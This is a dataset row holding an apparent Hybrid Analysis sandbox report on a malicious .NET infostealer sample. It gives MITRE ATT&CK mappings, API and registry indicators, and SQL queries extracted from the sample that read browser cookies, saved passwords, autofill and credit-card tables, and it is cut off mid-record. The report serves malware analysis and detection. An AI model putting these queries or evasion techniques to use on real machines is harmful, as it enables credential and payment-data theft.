id
stringlengths
64
64
url
stringlengths
99
99
source
stringclasses
5 values
report
stringlengths
3.94k
336k
e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9
https://hybrid-analysis.com/sample/e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9
Hybrid Analysis - Infostealers
{"size": 419840, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9", "sha256": "e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9", "av_detect": 85, "vx_family": "IL:Trojan.MSILMamut", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 1, "total_signatures": 121, "processes": [{"uid": "00000000-00003656", "name": "e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe", "normalized_path": "C:\\e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe", "sha256": "e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9", "av_label": "IL:Trojan.MSILMamut", "av_matched": 7, "av_total": 13}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "informative_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Browser Information Discovery", "attck_id": "T1217", "attck_id_wiki": "https://attack.mitre.org/techniques/T1217", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Bidirectional Communication", "attck_id": "T1102.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/002", "informative_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"System\\CurrentControlSet\\Control\\Nls\\RegionMapping\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\AppContext\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManag\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\XML\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallationType\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v{0}\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SystemDefaultTlsVersions\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SecurityProtocol\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Romance Standard Time\\Dynamic DST\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Romance Standard Time\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Romance Standard Time\" in Source: 00000000-00003656.00000001.343303.01910000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CryptUnprotectData\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"GetModuleHandle\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"GetTempPath\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"Sleep\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"MessageBox\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"LoadLibrary\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibrary\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API (Indicator: \"InitializeSecurityContext\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 642F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75050000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"RasPbFile\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party from cookies\")\n \"SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified from logins\")\n \"SELECT id,url,title,visit_count,typed_count,last_visit_time,hidden FROM urls\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,url,title,visit_count,typed_count,last_visit_time,hidden from urls\")\n \"SELECT id,guid,current_path,target_path,start_time,received_bytes,total_bytes,state,danger_type,interrupt_reason,hash,end_time,opened,last_access_time,transient,referrer,site_url,tab_url,tab_referrer_url,http_method,by_ext_id,by_ext_name,etag,last_modified,mime_type,original_mime_type,embedder_download_data FROM downloads\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,guid,current_path,target_path,start_time,received_bytes,total_bytes,state,danger_type,interrupt_reason,hash,end_time,opened,last_access_time,transient,referrer,site_url,tab_url,tab_referrer_url,http_method,by_ext_id,by_ext_name,etag,last_modified,mime_type,original_mime_type,embedder_download_data from downloads\")\n \"SELECT name,value,value_lower,date_created,date_last_used,count FROM autofill\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select name,value,value_lower,date_created,date_last_used,count from autofill\")\n \"SELECT guid,name_on_card,expiration_month,expiration_year,card_number_encrypted,date_modified,origin,use_count,use_date,billing_address_id,nickname FROM credit_cards\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select guid,name_on_card,expiration_month,expiration_year,card_number_encrypted,date_modified,origin,use_count,use_date,billing_address_id,nickname from credit_cards\")\n \"SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,originattributes,name,value,host,path,expiry,lastaccessed,creationtime,issecure,ishttponly,inbrowserelement,samesite,rawsamesite,schememap from moz_cookies\")\n \"SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name from moz_places\")\n \"SELECT 